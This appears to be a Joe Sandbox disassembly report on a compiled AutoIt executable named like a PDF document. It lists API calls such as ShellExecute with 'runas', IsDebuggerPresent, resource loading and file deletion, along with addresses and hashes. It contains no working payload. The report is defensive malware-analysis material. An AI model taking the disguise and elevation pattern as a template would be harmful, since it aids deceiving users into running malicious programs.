98958 fd560e 98957->98958 98959 fd55f6 98957->98959 98961 fd6e4e __lock_file 59 API calls 98958->98961 98965 fd5606 __alloc_osfhnd 98958->98965 99056 fd8d68 58 API calls __getptd_noexit 98959->99056 98964 fd5620 98961->98964 98962 fd55fb 99057 fd8ff6 9 API calls _W_expandtime 98962->99057 99040 fd556a 98964->99040 98965->98923 98970 10191dd 98969->98970 98971 10191cc 98969->98971 98970->98944 98975 fd4a93 98971->98975 98973->98947 98974->98947 98976 fd4a9f __alloc_osfhnd 98975->98976 98977 fd4abd 98976->98977 98978 fd4ad5 98976->98978 98980 fd4acd __alloc_osfhnd 98976->98980 99000 fd8d68 58 API calls __getptd_noexit 98977->99000 98981 fd6e4e __lock_file 59 API calls 98978->98981 98980->98970 98983 fd4adb 98981->98983 98982 fd4ac2 99001 fd8ff6 9 API calls _W_expandtime 98982->99001 98988 fd493a 98983->98988 98990 fd4949 98988->98990 98995 fd4967 98988->98995 98989 fd4957 99031 fd8d68 58 API calls __getptd_noexit 98989->99031 98990->98989 98990->98995 98998 fd4981 _memmove 98990->98998 98992 fd495c 99032 fd8ff6 9 API calls _W_expandtime 98992->99032 99002 fd4b0d LeaveCriticalSection LeaveCriticalSection __wfsopen 98995->99002 98997 fd4916 __fputwc_nolock 58 API calls 98997->98998 98998->98995 98998->98997 99003 fddac6 98998->99003 99033 fd4c6d 98998->99033 99039 fdb05e 78 API calls 6 library calls 98998->99039 99000->98982 99001->98980 99002->98980 99004 fddad2 __alloc_osfhnd 99003->99004 99005 fddadf 99004->99005 99006 fddaf6 99004->99006 99008 fd8d34 __chsize_nolock 58 API calls 99005->99008 99007 fddb95 99006->99007 99010 fddb0a 99006->99010 99011 fd8d34 __chsize_nolock 58 API calls 99007->99011 99009 fddae4 99008->99009 99012 fd8d68 _W_expandtime 58 API calls 99009->99012 99013 fddb28 99010->99013 99014 fddb32 99010->99014 99015 fddb2d 99011->99015 99024 fddaeb __alloc_osfhnd 99012->99024 99016 fd8d34 __chsize_nolock 58 API calls 99013->99016 99017 fdd446 ___lock_fhandle 59 API calls 99014->99017 99019 fd8d68 _W_expandtime 58 API calls 99015->99019 99016->99015 

                                    Control-flow Graph

                                    APIs
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FB3B7A
                                    • IsDebuggerPresent.KERNEL32 ref: 00FB3B8C
                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,010762F8,010762E0,?,?), ref: 00FB3BFD
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                      • Part of subcall function 00FC0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FB3C26,010762F8,?,?,?), ref: 00FC0ACE
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00FB3C81
                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010693F0,00000010), ref: 00FED4BC
                                    • SetCurrentDirectoryW.KERNEL32(?,010762F8,?,?,?), ref: 00FED4F4
                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01065D40,010762F8,?,?,?), ref: 00FED57A
                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00FED581
                                      • Part of subcall function 00FB3A58: GetSysColorBrush.USER32(0000000F), ref: 00FB3A62
                                      • Part of subcall function 00FB3A58: LoadCursorW.USER32(00000000,00007F00), ref: 00FB3A71
                                      • Part of subcall function 00FB3A58: LoadIconW.USER32(00000063), ref: 00FB3A88
                                      • Part of subcall function 00FB3A58: LoadIconW.USER32(000000A4), ref: 00FB3A9A
                                      • Part of subcall function 00FB3A58: LoadIconW.USER32(000000A2), ref: 00FB3AAC
                                      • Part of subcall function 00FB3A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FB3AD2
                                      • Part of subcall function 00FB3A58: RegisterClassExW.USER32(?), ref: 00FB3B28
                                      • Part of subcall function 00FB39E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FB3A15
                                      • Part of subcall function 00FB39E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FB3A36
                                      • Part of subcall function 00FB39E7: ShowWindow.USER32(00000000,?,?), ref: 00FB3A4A
                                      • Part of subcall function 00FB39E7: ShowWindow.USER32(00000000,?,?), ref: 00FB3A53
                                      • Part of subcall function 00FB43DB: _memset.LIBCMT ref: 00FB4401
                                      • Part of subcall function 00FB43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FB44A6
                                    Strings
                                    • This is a third-party compiled AutoIt script., xrefs: 00FED4B4
                                    • runas, xrefs: 00FED575
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                    • API String ID: 529118366-3287110873
                                    • Opcode ID: 4a10ae2405f5651a8908cf27d58b203ca674ea5a9a027a37c93db3aa6b67aeb5
                                    • Instruction ID: cd97adf48de32d82a717fab40fe033936971042c4b172a6709a6cf893e815e7e
                                    • Opcode Fuzzy Hash: 4a10ae2405f5651a8908cf27d58b203ca674ea5a9a027a37c93db3aa6b67aeb5
                                    • Instruction Fuzzy Hash: 8F512571D04649AEDB21EBF2DC06EFD7BB8AB44310F044069F492B6151CA7E5606EF21

                                    Control-flow Graph

                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 00FB4B2B
                                      • Part of subcall function 00FB7D2C: _memmove.LIBCMT ref: 00FB7D66
                                    • GetCurrentProcess.KERNEL32(?,0103FAEC,00000000,00000000,?), ref: 00FB4BF8
                                    • IsWow64Process.KERNEL32(00000000), ref: 00FB4BFF
                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00FB4C45
                                    • FreeLibrary.KERNEL32(00000000), ref: 00FB4C50
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00FB4C81
                                    • GetSystemInfo.KERNEL32(00000000), ref: 00FB4C8D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                    • String ID:
                                    • API String ID: 1986165174-0
                                    • Opcode ID: fb04228d53189e76826a716b7b58d6be5964b7d906ac8af9fc2ed993f677d87f
                                    • Instruction ID: 8875c08736bffc27e61d10cdb476defe410106caef771f14b605e2ade2371426
                                    • Opcode Fuzzy Hash: fb04228d53189e76826a716b7b58d6be5964b7d906ac8af9fc2ed993f677d87f
                                    • Instruction Fuzzy Hash: 2891F67194A7C0DEC731CB7985512EAFFE4AF66310B548D5DD0CB83A42D224F908EB5A

                                    Control-flow Graph

                                    APIs
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00FB4EEE,?,?,00000000,00000000), ref: 00FB4FF9
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00FB4EEE,?,?,00000000,00000000), ref: 00FB5010
                                    • LoadResource.KERNEL32(?,00000000,?,?,00FB4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F8F), ref: 00FEDD60
                                    • SizeofResource.KERNEL32(?,00000000,?,?,00FB4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F8F), ref: 00FEDD75
                                    • LockResource.KERNEL32(00FB4EEE,?,?,00FB4EEE,?,?,00000000,00000000,?,?,?,?,?,?,00FB4F8F,00000000), ref: 00FEDD88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: bdd186bcd6ecdbdd2464dad3945eb75711a55f1ced7d8be4155946ea8fb1e4ad
                                    • Instruction ID: 1f20d6b0ef7b17ab3246fb0a9d4968276c90cb26afba9b669f7f7f9ecd0bc85b
                                    • Opcode Fuzzy Hash: bdd186bcd6ecdbdd2464dad3945eb75711a55f1ced7d8be4155946ea8fb1e4ad
                                    • Instruction Fuzzy Hash: 30119A75A00B02AFD731AB26DC48F677BBDEBC9B51F20416CF44686250DB66E8009A61
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?,00FEE7C1), ref: 010146A6
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 010146B7
                                    • FindClose.KERNEL32(00000000), ref: 010146C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirst
                                    • String ID:
                                    • API String ID: 48322524-0
                                    • Opcode ID: 82f96fb834647089dba9b0ff6cb64e8ac3be2d4ef74fcabd52b641cc8328118d
                                    • Instruction ID: 92fea4eb28da106660aa0c208df51bc02bbed0f3cfefc86e30f597752d422f42
                                    • Opcode Fuzzy Hash: 82f96fb834647089dba9b0ff6cb64e8ac3be2d4ef74fcabd52b641cc8328118d
                                    • Instruction Fuzzy Hash: 8EE0D832D10402DB42206678EC4D8EA779C9F09339F000B45F8F5C20E4EBB859508697
                                    Strings
                                    • Variable must be of type 'Object'., xrefs: 00FF428C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable must be of type 'Object'.
                                    • API String ID: 0-109567571
                                    • Opcode ID: 492cf0d520f05bef839ef0fdcba40c81d4378893500e007818ba1bd8f02948c6
                                    • Instruction ID: 7dcb119816fea080aeb2218f4a557fd81298a97e124aae23d41f0d5eaa60a7a8
                                    • Opcode Fuzzy Hash: 492cf0d520f05bef839ef0fdcba40c81d4378893500e007818ba1bd8f02948c6
                                    • Instruction Fuzzy Hash: 25A27875E00209CBCB24CF59C880AEAB7B2FF58310F248069E956AB355D735ED46EF91
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC0BBB
                                    • timeGetTime.WINMM ref: 00FC0E76
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FC0FB3
                                    • TranslateMessage.USER32(?), ref: 00FC0FC7
                                    • DispatchMessageW.USER32(?), ref: 00FC0FD5
                                    • Sleep.KERNEL32(0000000A), ref: 00FC0FDF
                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00FC105A
                                    • DestroyWindow.USER32 ref: 00FC1066
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FC1080
                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00FF52AD
                                    • TranslateMessage.USER32(?), ref: 00FF608A
                                    • DispatchMessageW.USER32(?), ref: 00FF6098
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FF60AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                    • API String ID: 4003667617-3242690629
                                    • Opcode ID: 337fc4eff35bd349d1faa8d0229d866784d277cc9453dccc8d97914f5070c0d5
                                    • Instruction ID: 65cba0d70707bab868854bb542d52ceb98635220816936783e4aa112914e6b46
                                    • Opcode Fuzzy Hash: 337fc4eff35bd349d1faa8d0229d866784d277cc9453dccc8d97914f5070c0d5
                                    • Instruction Fuzzy Hash: FCB22570A08742DFD724DF24C885FBAB7E4BF84714F14491DE68A872A1CB75E845EB82

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 010191E9: __time64.LIBCMT ref: 010191F3
                                      • Part of subcall function 00FB5045: _fseek.LIBCMT ref: 00FB505D
                                    • __wsplitpath.LIBCMT ref: 010194BE
                                      • Part of subcall function 00FD432E: __wsplitpath_helper.LIBCMT ref: 00FD436E
                                    • _wcscpy.LIBCMT ref: 010194D1
                                    • _wcscat.LIBCMT ref: 010194E4
                                    • __wsplitpath.LIBCMT ref: 01019509
                                    • _wcscat.LIBCMT ref: 0101951F
                                    • _wcscat.LIBCMT ref: 01019532
                                      • Part of subcall function 0101922F: _memmove.LIBCMT ref: 01019268
                                      • Part of subcall function 0101922F: _memmove.LIBCMT ref: 01019277
                                    • _wcscmp.LIBCMT ref: 01019479
                                      • Part of subcall function 010199BE: _wcscmp.LIBCMT ref: 01019AAE
                                      • Part of subcall function 010199BE: _wcscmp.LIBCMT ref: 01019AC1
                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 010196DC
                                    • _wcsncpy.LIBCMT ref: 0101974F
                                    • DeleteFileW.KERNEL32(?,?), ref: 01019785
                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0101979B
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 010197AC
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 010197BE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                    • String ID:
                                    • API String ID: 1500180987-0
                                    • Opcode ID: 0a5c16407c5c7311c7ebfd701351ede40f8c055848570498f5080221a7593296
                                    • Instruction ID: 1fbd63b7872eabe79559d7bd48905276c6a38885b8fafd23f1ac134d2cb6561e
                                    • Opcode Fuzzy Hash: 0a5c16407c5c7311c7ebfd701351ede40f8c055848570498f5080221a7593296
                                    • Instruction Fuzzy Hash: 6CC15CB1D00219AADF21DF95CC81EDEBBBDEF54304F0040AAE649E7245DB389A848F65

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00FB3074
                                    • RegisterClassExW.USER32(00000030), ref: 00FB309E
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB30AF
                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FB30CC
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB30DC
                                    • LoadIconW.USER32(000000A9), ref: 00FB30F2
                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB3101
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 2914291525-1005189915
                                    • Opcode ID: e96dba5fcaf70dbb2f105752c451ff38d08545c6c2e724490a6e5cdec003680e
                                    • Instruction ID: e348409fb619847e88792f730fa355fece244815c37d7a151a987a36dce63953
                                    • Opcode Fuzzy Hash: e96dba5fcaf70dbb2f105752c451ff38d08545c6c2e724490a6e5cdec003680e
                                    • Instruction Fuzzy Hash: B73187B1C4430AAFEB61CFA4D884AC9BFF4FB09310F14465AE5C1E6280E3BA4585CF91

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00FB3074
                                    • RegisterClassExW.USER32(00000030), ref: 00FB309E
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB30AF
                                    • InitCommonControlsEx.COMCTL32(?), ref: 00FB30CC
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB30DC
                                    • LoadIconW.USER32(000000A9), ref: 00FB30F2
                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB3101
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 2914291525-1005189915
                                    • Opcode ID: a7831d74c8abaf8f8823f1d647dbc1f207f57a002e7f3436c6a2e6516971dd97
                                    • Instruction ID: 819c73d49a43ecd2fc46622264a93dbb10d3e5b578ffc7a650b581640a0ae31a
                                    • Opcode Fuzzy Hash: a7831d74c8abaf8f8823f1d647dbc1f207f57a002e7f3436c6a2e6516971dd97
                                    • Instruction Fuzzy Hash: 7A21C8B1D00619AFEB60DF94E949A9DBBF8FB08700F00451AF591E6294D7BB45448F91

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00FB4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,010762F8,?,00FB37C0,?), ref: 00FB4882
                                      • Part of subcall function 00FD074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00FB72C5), ref: 00FD0771
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00FB7308
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FEECF1
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FEED32
                                    • RegCloseKey.ADVAPI32(?), ref: 00FEED70
                                    • _wcscat.LIBCMT ref: 00FEEDC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                    • API String ID: 2673923337-2727554177
                                    • Opcode ID: fff3da0ea6ecb6e52f38f85ece088a29e82626c2d1b7f06f02685840333d82e9
                                    • Instruction ID: 6dfe190273fe8215fb9df8ce72d571a7dbaca62c82a7e7c644b02404f8bbf22b
                                    • Opcode Fuzzy Hash: fff3da0ea6ecb6e52f38f85ece088a29e82626c2d1b7f06f02685840333d82e9
                                    • Instruction Fuzzy Hash: A571B1718083019EC324EF26EC8589FB7E8FF94790F44442EF495A7264EB399949DF62

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00FB3A62
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00FB3A71
                                    • LoadIconW.USER32(00000063), ref: 00FB3A88
                                    • LoadIconW.USER32(000000A4), ref: 00FB3A9A
                                    • LoadIconW.USER32(000000A2), ref: 00FB3AAC
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FB3AD2
                                    • RegisterClassExW.USER32(?), ref: 00FB3B28
                                      • Part of subcall function 00FB3041: GetSysColorBrush.USER32(0000000F), ref: 00FB3074
                                      • Part of subcall function 00FB3041: RegisterClassExW.USER32(00000030), ref: 00FB309E
                                      • Part of subcall function 00FB3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB30AF
                                      • Part of subcall function 00FB3041: InitCommonControlsEx.COMCTL32(?), ref: 00FB30CC
                                      • Part of subcall function 00FB3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FB30DC
                                      • Part of subcall function 00FB3041: LoadIconW.USER32(000000A9), ref: 00FB30F2
                                      • Part of subcall function 00FB3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FB3101
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 423443420-4155596026
                                    • Opcode ID: 03322d027bef1076f82e8b1fb18664b1b7c0270a52100727daf2180c0db158f7
                                    • Instruction ID: 8b08f163853aba8cadef6aec5d004524bba24b86ee4cd94a51c585e5ed67a699
                                    • Opcode Fuzzy Hash: 03322d027bef1076f82e8b1fb18664b1b7c0270a52100727daf2180c0db158f7
                                    • Instruction Fuzzy Hash: BA217A70E00B09AFEB619FA5E809B9D7BB5FB08710F00012AF681B6294C7BF56459F90

                                    Control-flow Graph

                                    • Function entry 00FB3633. The rendered graph is not reproduced here; its blocks mark API call sites for DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus (MoveWindow and SetFocus do not appear in the APIs list below).
                                    APIs
                                    • DefWindowProcW.USER32(?,?,?,?), ref: 00FB36D2
                                    • KillTimer.USER32(?,00000001), ref: 00FB36FC
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FB371F
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FB372A
                                    • CreatePopupMenu.USER32 ref: 00FB373E
                                    • PostQuitMessage.USER32(00000000), ref: 00FB375F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                    • String ID: TaskbarCreated
                                    • API String ID: 129472671-2362178303
